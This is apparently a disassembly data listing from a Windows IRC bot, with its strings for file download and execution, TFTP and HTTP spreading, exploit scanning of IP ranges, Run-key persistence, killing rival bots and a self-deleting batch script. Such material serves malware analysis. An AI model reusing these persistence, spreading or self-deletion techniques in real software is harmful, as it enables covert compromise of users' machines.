aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: J8@F_7_S:0041BB21�o
align 10h
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: J8@F_7_S:loc_41BB3D�o
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: J8@F_7_S:loc_41BB44�o
align 10h
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424888�o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:0042488C�o
align 10h
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41B775+5A�o
aRb db 'rb',0 ; DATA XREF: sub_41B3D0+44�o
align 10h
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B3D0+1A4�o
align 4
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424890�o
align 10h
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F950 dd 0D728AE22h ; DATA XREF: sub_4143D0+318�r
dword_41F954 dd 428A2F98h ; DATA XREF: sub_4143D0+31F�r
dword_41F958 dd 23EF65CDh ; DATA XREF: sub_4143D0+548�r
dword_41F95C dd 71374491h ; DATA XREF: sub_4143D0+54F�r
dword_41F960 dd 0EC4D3B2Fh ; DATA XREF: sub_4143D0+772�r
dword_41F964 dd 0B5C0FBCFh ; DATA XREF: sub_4143D0+779�r
dword_41F968 dd 8189DBBCh ; DATA XREF: sub_4143D0+9B8�r
dword_41F96C dd 0E9B5DBA5h ; DATA XREF: sub_4143D0+9BF�r
dword_41F970 dd 0F348B538h ; DATA XREF: sub_4143D0+BFE�r
dword_41F974 dd 3956C25Bh ; DATA XREF: sub_4143D0+C09�r
dword_41F978 dd 0B605D019h ; DATA XREF: sub_4143D0+E80�r
dword_41F97C dd 59F111F1h ; DATA XREF: sub_4143D0+E87�r
dword_41F980 dd 0AF194F9Bh ; DATA XREF: sub_4143D0+10D7�r
dword_41F984 dd 923F82A4h ; DATA XREF: sub_4143D0+10DE�r
dword_41F988 dd 0DA6D8118h ; DATA XREF: sub_4143D0+1319�r
dword_41F98C dd 0AB1C5ED5h ; DATA XREF: sub_4143D0+1320�r
dword_41F990 dd 0A3030242h ; DATA XREF: sub_4143D0+1569�r
dword_41F994 dd 0D807AA98h ; DATA XREF: sub_4143D0+1570�r
dword_41F998 dd 45706FBEh ; DATA XREF: sub_4143D0+17AB�r
dword_41F99C dd 12835B01h ; DATA XREF: sub_4143D0+17B2�r
dword_41F9A0 dd 4EE4B28Ch ; DATA XREF: sub_4143D0+19F3�r
dword_41F9A4 dd 243185BEh ; DATA XREF: sub_4143D0+19FA�r
dword_41F9A8 dd 0D5FFB4E2h ; DATA XREF: sub_4143D0+1C39�r
dword_41F9AC dd 550C7DC3h ; DATA XREF: sub_4143D0+1C40�r
dword_41F9B0 dd 0F27B896Fh ; DATA XREF: sub_4143D0+1E91�r
dword_41F9B4 dd 72BE5D74h ; DATA XREF: sub_4143D0+1E9C�r
dword_41F9B8 dd 3B1696B1h ; DATA XREF: sub_4143D0+210D�r
dword_41F9BC dd 80DEB1FEh ; DATA XREF: sub_4143D0+2114�r
dword_41F9C0 dd 25C71235h ; DATA XREF: sub_4143D0+236A�r
dword_41F9C4 dd 9BDC06A7h ; DATA XREF: sub_4143D0+2371�r
dword_41F9C8 dd 0CF692694h ; DATA XREF: sub_4143D0+25B8�r
dword_41F9CC dd 0C19BF174h ; DATA XREF: sub_4143D0+25BF�r
dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh, 831153B5h
dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h, 0A831C66Dh
dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h, 0B8D2D0C8h
dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h, 2748774Ch
dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h, 682E6FF3h
dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh, 113F9804h
dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h, 0CBBB9D5Dh
dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h, 8EB44A87h
dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
dword_41FE50 dd 0F3BCC908h, 6A09E667h, 84CAA73Bh, 0BB67AE85h, 0FE94F82Bh
; DATA XREF: sub_4143A0+17�o
dd 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h, 510E527Fh
dd 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh, 1F83D9ABh, 137E2179h
dd 5BE0CD19h, 90h dup(0)
dword_4200D0 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_4200F0 dd 255C7325h, 73h ; DATA XREF: sub_416F86+DC�o
aSoftwareMicr_6 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+10C�o
align 4
aSoftwareMicr_7 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_416F86+14F�o
align 4
aSS_3 db '%s\%s',0 ; DATA XREF: sub_417119+BA�o
align 10h
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+F9�o
align 10h
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_417119+14D�o
align 10h
aBadAllocatio_9 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424A44�o
align 10h
aIrn db '--irn ',0 ; DATA XREF: J8@F_7_S:0041BC44�o
align 4
aSS_5 db '%s\%s',0 ; DATA XREF: J8@F_7_S:0041BCF1�o
align 10h
aSSS_0 db '%s %s%s',0 ; DATA XREF: J8@F_7_S:0041BDBF�o
aS_11 db '%s',0 ; DATA XREF: J8@F_7_S:0041BE51�o
align 4
aRm db 'RM',0 ; DATA XREF: J8@F_7_S:0041BF25�o
align 10h
aBk db 'BK',0 ; DATA XREF: J8@F_7_S:0041BF5E�o
align 4
aUnm db 'UNM',0 ; DATA XREF: J8@F_7_S:0041BF83�o
aBadAllocati_10 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00425224�o
align 4
aSS_6 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41829C+42�o
aSS_7 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802F+159�o
aSS_8 db '%s-%s',0 ; DATA XREF: sub_41802F+1D6�o
align 10h
aSSSS00S db '%s %s',0Dh,0Ah ; DATA XREF: sub_41802F+24D�o
db '%s %s 0 0 :%s',0Dh,0Ah,0
align 4
asc_420238 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+7E�o
align 4
aS_10 db '%s',0 ; DATA XREF: sub_417F01+B6�o
align 10h
asc_420240 db 0Dh,0Ah,0 ; DATA XREF: sub_417F01+CB�o
align 4
aSSS_1 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417361+C2�o
align 10h
aS_12 db '%s',0 ; DATA XREF: sub_41783D+4A�o
align 4
asc_420254 db ' :',0 ; DATA XREF: sub_41783D+7E�o
align 4
aS_13 db '%s',0 ; DATA XREF: sub_41783D+8A�o
align 4
asc_42025C: ; DATA XREF: sub_41783D+E1�o
unicode 0, < >,0
aS_14 db '%s',0 ; DATA XREF: sub_41783D+FA�o
align 4
asc_420264: ; DATA XREF: sub_41783D+124�o
unicode 0, < >,0
aSS_9 db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+24A�o
aSSS_2 db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41783D+31E�o
align 4
a001 db '001',0 ; DATA XREF: sub_41783D+33A�o
aSSSSSS db '%s %s %s',0Dh,0Ah ; DATA XREF: sub_41783D+3D3�o
db '%s %s %s',0Dh,0Ah,0
align 4
a332 db '332',0 ; DATA XREF: sub_41783D+417�o
asc_42029C db ' :',0 ; DATA XREF: sub_41783D+499�o
align 10h
aS_0 db '%s',0 ; DATA XREF: sub_41783D+4A5�o
align 4
asc_4202A4: ; DATA XREF: sub_41783D+4D9�o
unicode 0, <!>,0
aS_1 db '%s',0 ; DATA XREF: sub_41783D+4E5�o
align 4
a332_0 db '332',0 ; DATA XREF: sub_41783D+52D�o
aS_2 db '%s',0 ; DATA XREF: sub_41783D+546�o
align 4
aS_3 db '%s',0 ; DATA XREF: sub_41783D+5B1�o
align 4
aS_4 db '%s',0 ; DATA XREF: sub_41783D+5DF�o
align 4
asc_4202BC: ; DATA XREF: sub_41783D+64E�o
unicode 0, <;>,0
asc_4202C0: ; DATA XREF: sub_41783D:loc_417E92�o
unicode 0, <;>,0
asc_4202C4: ; DATA XREF: sub_41783D:loc_417E9F�o
unicode 0, <;>,0
asc_4202C8: ; DATA XREF: sub_417676+C�o
unicode 0, < >,0
aS_8 db '-s',0 ; DATA XREF: sub_417676+27�o
align 10h
aS_9 db '/s',0 ; DATA XREF: sub_417676+3F�o
align 4
asc_4202D4: ; DATA XREF: sub_417676:loc_4176CA�o
unicode 0, < >,0
aQwertyuiopasdf db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
; DATA XREF: sub_41748B+21�o
align 10h
asc_420310: ; DATA XREF: sub_41748B+5E�o
unicode 0, <[>,0
aSS db '%s%s|',0 ; DATA XREF: sub_41748B+95�o
align 4
aSS_0 db '%s%s|',0 ; DATA XREF: sub_41748B+C5�o
align 4
aSp db '%sP|',0 ; DATA XREF: sub_41748B+F0�o
align 4
aS0I64u db '%s0%I64u|',0 ; DATA XREF: sub_41748B+12F�o
align 4
aSI64u db '%s%I64u|',0 ; DATA XREF: sub_41748B+150�o
align 4
aSC db '%s%c',0 ; DATA XREF: sub_41748B+18F�o
align 4
aS db '%s]',0 ; DATA XREF: sub_41748B+1BA�o
aBadAllocati_11 db 'bad allocation',0
align 10h
aHs db 'HS',0 ; DATA XREF: sub_418D17+28�o
align 4
asc_420364: ; DATA XREF: sub_418C40+89�o
unicode 0, < >,0
aSS_10 db '%s\%s',0 ; DATA XREF: sub_418B1F+4E�o
align 10h
aGet db 'GET',0 ; DATA XREF: sub_418552+B7�o
aQue?_1 db 'Que?',0 ; DATA XREF: sub_418552+C7�o
align 10h
aHttp1_1501NotI db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418552+10F�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
aSSSS db '%s\%s\%s%s',0 ; DATA XREF: sub_418552+229�o
align 4
aSSS db '%s\%s\%s',0 ; DATA XREF: sub_418552+1F2�o
align 10h
aSS_4 db '%s\%s',0 ; DATA XREF: sub_418552+25A�o
align 4
aQue? db 'Que?',0 ; DATA XREF: sub_418552+3A8�o
align 10h
aQue?_0 db 'Que?',0 ; DATA XREF: sub_418552+2BE�o
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418552+3FC�o
db 'Content-Length: %d',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpTransferD_ db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
; DATA XREF: sub_418552+51D�o
align 4
aHttpTransfer_0 db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
; DATA XREF: sub_418552+54A�o
align 4
asc_42049C db 0Dh,0Ah,0 ; DATA XREF: sub_4184BF+11�o
align 10h
asc_4204A0: ; DATA XREF: sub_4184BF:loc_4184EB�o
unicode 0, < >,0
asc_4204A4: ; DATA XREF: sub_4184BF+3D�o
unicode 0, < >,0
asc_4204A8: ; DATA XREF: sub_4184BF+54�o
unicode 0, < >,0
asc_4204AC db 0Dh,0Ah ; DATA XREF: sub_4184BF+78�o
db 0Dh,0Ah,0
align 4
asc_4204B4 db '%x',0 ; DATA XREF: sub_418396+CA�o
align 4
aBadAllocati_12 db 'bad allocation',0
align 4
aS_15 db '%s',0 ; DATA XREF: sub_41B7F9+74�o
align 4
aSX db '%s%X',0 ; DATA XREF: sub_41B7F9+EC�o
align 4
aBadAllocati_13 db 'bad allocation',0
align 4
a@echoOff1DelSI db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190BD+7E�o
db ':1',0Dh,0Ah
db 'del "%s"',0Dh,0Ah
db 'if exist "%s" goto 1',0Dh,0Ah
db 'del "%%0"',0Dh,0Ah,0
align 10h
aSTmpIIICCC_bat db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4190BD+FC�o
align 4
aW: ; DATA XREF: sub_4190BD+110�o
unicode 0, <w>,0
aS_6 db '%s',0 ; DATA XREF: sub_4190BD+12B�o
align 4
aRegistryMonito db 'Registry Monitor',0 ; DATA XREF: sub_419477+D9�o
align 4
aSoftwareMicr_1 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419477+12A�o
align 4
aQuitSYouKill_0 db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
; DATA XREF: sub_419477+15A�o
align 4
aRemoveAuthenti db 'Remove: Authentication Failed.',0
align 4
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_418FC6+4E�o
aVis db 'VIS',0 ; DATA XREF: sub_418E51+42�o
a2k3 db '2K3',0 ; DATA XREF: sub_418E51+55�o
aXp_0 db 'XP',0 ; DATA XREF: sub_418E51+62�o
align 4
a2k db '2K',0 ; DATA XREF: sub_418E51+6E�o
align 4
aMe db 'ME',0 ; DATA XREF: sub_418E51+81�o
align 4
a98 db '98',0 ; DATA XREF: sub_418E51+8E�o
align 10h
aNt db 'NT',0 ; DATA XREF: sub_418E51+A0�o
align 4
a95 db '95',0 ; DATA XREF: sub_418E51+AD�o
align 4
aUnk db 'UNK',0 ; DATA XREF: sub_418E51:loc_418F05�o
aOsMicrosoftWin db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
; DATA XREF: sub_418E51+108�o
align 4
aS_5 db '%s',0 ; DATA XREF: sub_418E51+13A�o
align 10h
a192_168__ db '192.168.*.*',0 ; DATA XREF: sub_419347+32�o
a10___ db '10.*.*.*',0 ; DATA XREF: sub_419347+46�o
align 4
a111___ db '111.*.*.*',0 ; DATA XREF: sub_419347+5A�o
align 4
a15___ db '15.*.*.*',0 ; DATA XREF: sub_419347+6E�o
align 10h
a16___ db '16.*.*.*',0 ; DATA XREF: sub_419347+82�o
align 4
a101___ db '101.*.*.*',0 ; DATA XREF: sub_419347+96�o
align 4
a110___ db '110.*.*.*',0 ; DATA XREF: sub_419347+A6�o
align 4
a112___ db '112.*.*.*',0 ; DATA XREF: sub_419347+B6�o
align 10h
a170_65__ db '170.65.*.*',0 ; DATA XREF: sub_419347+C6�o
align 4
a172_D__ db '172.%d.*.*',0 ; DATA XREF: sub_419347+E0�o
align 4
aBadAllocati_14 db 'bad allocation',0
align 4
aBadAllocati_15 db 'bad allocation',0
align 4
aMessageboxa_0 db 'MessageBoxA',0 ; DATA XREF: sub_419677+12�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_419677+17�o
align 10h
dword_420700 dd 0D010Fh, 0C3000000h, 0 ; DATA XREF: sub_4195EC+19�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
dd 69746163h, 6E6Fh
dword_42072C dd 63257325h, 0 ; DATA XREF: sub_4196D1+55�o
dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_420744 dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ; DATA XREF: sub_419EA0+3C�o
dword_420754 dd 68637673h, 2E74736Fh, 657865h ; DATA XREF: sub_419EA0+44�o
dword_420760 dd 76726573h, 73656369h, 6578652Eh, 0 ; DATA XREF: sub_419EA0+4C�o
aOpenthread db 'OpenThread',0 ; DATA XREF: sub_419EA0+5F�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+64�o
align 4
aOpenprocess db 'OpenProcess',0 ; DATA XREF: sub_419EA0+78�o
aKernel32_dll_1 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+7D�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_419EA0+8C�o
align 4
aKernel32_dll_2 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+91�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_419EA0+A0�o
align 4
aKernel32_dll_3 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+A5�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_419EA0+B4�o
align 4
aKernel32_dll_4 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+B9�o
align 4
aModule32first db 'Module32First',0 ; DATA XREF: sub_419EA0+C8�o
align 4
aKernel32_dll_5 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+CD�o
align 4
aModule32next db 'Module32Next',0 ; DATA XREF: sub_419EA0+DC�o
align 4
aKernel32_dll_6 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+E1�o
align 4
aThread32first db 'Thread32First',0 ; DATA XREF: sub_419EA0+F0�o
align 4
aKernel32_dll_7 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+F5�o
align 4
aThread32next db 'Thread32Next',0 ; DATA XREF: sub_419EA0+104�o
align 4
aKernel32_dll_8 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+109�o
align 4
aReadprocessmem db 'ReadProcessMemory',0 ; DATA XREF: sub_419EA0+118�o
align 4
aKernel32_dll_9 db 'kernel32.dll',0 ; DATA XREF: sub_419EA0+11D�o
align 4
aGetmodulefilen db 'GetModuleFileNameExA',0 ; DATA XREF: sub_419EA0+12C�o
align 10h
aPsapi_dll db 'psapi.dll',0 ; DATA XREF: sub_419EA0+131�o
align 4
aSS_2 db '%s\%s',0 ; DATA XREF: sub_419EA0+1F5�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+2BE�o
align 4
aSedebugprivi_0 db 'SeDebugPrivilege',0 ; DATA XREF: sub_419EA0+365�o
align 4
aSystem db 'System',0 ; DATA XREF: sub_419EA0+390�o
align 4
aBotKilledS db 'Bot Killed: %s',0 ; DATA XREF: sub_419EA0+451�o
align 4
aSoftwareMicr_2 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_419A9F+36�o
align 4
aSoftwareMicr_3 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
; DATA XREF: sub_419A9F+3D�o
align 4
aSoftwareMicr_4 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
; DATA XREF: sub_419A9F+44�o
aSoftwareMicr_5 db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
; DATA XREF: sub_419A9F+4B�o
align 4
aSystemControls db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
; DATA XREF: sub_419C6D+26�o
align 4
aSS_1 db '%s\%s',0 ; DATA XREF: sub_419C6D+E4�o
align 4
aLdm db 'LDM',0 ; DATA XREF: sub_419C6D+118�o
aNetdde db 'NetDDE',0 ; DATA XREF: sub_419C6D+12B�o
align 4
aEventmessagefi db 'EventMessageFile',0 ; DATA XREF: sub_419C6D+142�o
align 4
aBadAllocati_16 db 'bad allocation',0
align 4
aListTTooLong db 'list<T> too long',0
align 10h
dd offset dword_420E80
off_420A74 dd offset nullsub_1 ; DATA XREF: sub_41BB84+23�o
dd 7325h, 652Dh, 31h, 4C44h
aDlAuthFailure_ db 'DL: Auth Failure.',0
align 4
aDlInvalidArgum db 'DL: Invalid Arguments',0
align 4
aUpdAuthFailure db 'UPD: Auth Failure.',0
align 4
aUpdInvalidArgu db 'UPD: Invalid Arguments.',0
dd offset dword_421030
off_420AE4 dd offset sub_40177B ; DATA XREF: J8@F_7_S:0041C3BA�o
dd offset dword_420FE4
off_420AEC dd offset sub_4019F3 ; DATA XREF: J8@F_7_S:0041C3D6�o
aHttpSDS_3 db 'http://%s:%d/%s',0
dd offset dword_42107C
off_420B04 dd offset sub_401C1D ; DATA XREF: J8@F_7_S:0041C3F2�o
aSystemSCpuIXS@ db 'System: %s [CPU: %i x %s @ %dMhz] [RAM: %iMB/%iMB] [Country: %s] '
db '[IP: %s] [User: %s] [System Dir: %s] [Uptime: %I64ud %I64uh %I64u'
db 'm]',0
align 10h
aNetIpSHostNA db 'Net: IP: %s Host: N/A',0
align 4
aNetIpSHostS db 'Net: IP: %s Host: %s',0
align 10h
dd offset dword_421114
off_420BC4 dd offset sub_401CC0 ; DATA XREF: J8@F_7_S:0041C40E�o
dd offset dword_4210C8
off_420BCC dd offset sub_401E82 ; DATA XREF: J8@F_7_S:0041C42A�o
aScanUnknownExp db 'Scan: Unknown Exploit.',0
align 4
a____0 db '*.*.*.*',0
aA db '-a',0
align 4
aB db '-b',0
align 4
aC db '-c',0
align 4
aScanNotEnoughT db 'Scan: Not Enough Threads. %d Available.',0
aD_D_D_D_0 db '%d.%d.%d.%d',0
aX_ db 'x.',0
align 4
aD_ db '%d.',0
aSx_ db '%sx.',0
align 10h
aSD_ db '%s%d.',0
align 4
aSx db '%sx',0
aSD db '%s%d',0
align 4
aD_x_x_x db '%d.x.x.x',0
align 10h
aD_D_x_x db '%d.%d.x.x',0
align 4
aD_D_D_x db '%d.%d.%d.x',0
align 4
aScanSDUsingDTh db 'Scan: %s:%d Using %d Threads.',0
align 4
aScanner db 'Scanner',0
aScanAllScanThr db 'Scan: All Scan Threads Stopped. %d killed.',0
align 4
aStatisticsExpl db 'Statistics: Exploits:',0
align 4
aSSD db '%s %s: %d',0
align 10h
aSDaemons db '%s; Daemons:',0
align 10h
aSTftpD db '%s TFTP: %d',0
aSHttpD db '%s HTTP: %d',0
dd offset dword_4211F8
off_420D1C dd offset sub_401F1C ; DATA XREF: J8@F_7_S:0041C454�o
dd offset dword_4211AC
off_420D24 dd offset sub_40243A ; DATA XREF: J8@F_7_S:0041C470�o
dd offset dword_421160
off_420D2C dd offset sub_40251A ; DATA XREF: J8@F_7_S:0041C48C�o
dbl_420D30 dq 5.0e-1 ; DATA XREF: sub_41A9DE:loc_41AF68�r
flt_420D38 dd 4.2949673e9 ; DATA XREF: sub_41A9DE+584�r
align 10h
dd 48h, 0Eh dup(0)
dd offset dword_423064
dd offset dword_421250
dd 10h
dword_420D88 dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041D334�o
dd offset off_423008
dd offset dword_420D9C
dword_420D9C dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420D98�o
dd 3, 420DACh, 420DBCh, 420F48h, 420F94h, 0
dd offset off_423008
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420D9Ch
dword_420DD8 dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041D368�o
dd offset off_425958
dd offset dword_420FB0
dword_420DEC dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041D388�o
dd offset off_423030
dd offset dword_420E00
dword_420E00 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420DFC�o
dd 1, 420E10h, 420E18h, 0
dd offset off_423030
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E00h
dword_420E34 dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041DC20�o
dd offset off_423E50
dd offset dword_420E48
dword_420E48 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420E44�o
dd 2, 420E58h, 420E64h, 420F94h, 0
dd offset off_423E50
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420E48h
dword_420E80 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420A70�o
dd offset off_425900
dd offset dword_420E94
dword_420E94 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420E90�o
dd 1, 420EA4h, 420EACh, 0
dd offset off_425900
dd 2 dup(0)
dd 0FFFFFFFFh, 0
dd 40h, 420E94h
dword_420EC8 dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041D328�o
dd offset off_425918
dd offset dword_420EDC
dword_420EDC dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420ED8�o
dd 3, 420EECh, 420EFCh, 420F48h, 420F94h, 0
dd offset off_425918
dd 2, 0
dd 0FFFFFFFFh, 0
dd 40h, 420EDCh
dword_420F18 dd 3 dup(0) ; DATA XREF: J8@F_7_S:0041D31C�o
dd offset off_425938
dd offset dword_420F2C
dword_420F2C dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420F28�o
dd 2, 420F3Ch, 420F48h, 420F94h, 0
dd offset off_425938
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F2Ch, 3 dup(0)
dd offset off_425974
dd offset dword_420F78
dword_420F78 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420F74�o
dd 2, 420F88h, 420FC8h, 420F94h, 0
dd offset off_425958
align 10h
dd 0FFFFFFFFh, 0
dd 40h, 420FB0h
dword_420FB0 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420DE8�o
dd 1, 420FC0h, 420F94h, 0
dd offset off_425974
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420F78h
dword_420FE4 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420AE8�o
dd offset off_425990
dd offset dword_420FF8
dword_420FF8 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00420FF4�o
dd 2, 421008h, 421014h, 420EACh, 0
dd offset off_425990
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 420FF8h
dword_421030 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420AE0�o
dd offset off_4259A8
dd offset dword_421044
dword_421044 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00421040�o
dd 2, 421054h, 421060h, 420EACh, 0
dd offset off_4259A8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421044h
dword_42107C dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420B00�o
dd offset off_4259BC
dd offset dword_421090
dword_421090 dd 2 dup(0) ; DATA XREF: J8@F_7_S:0042108C�o
dd 2, 4210A0h, 4210ACh, 420EACh, 0
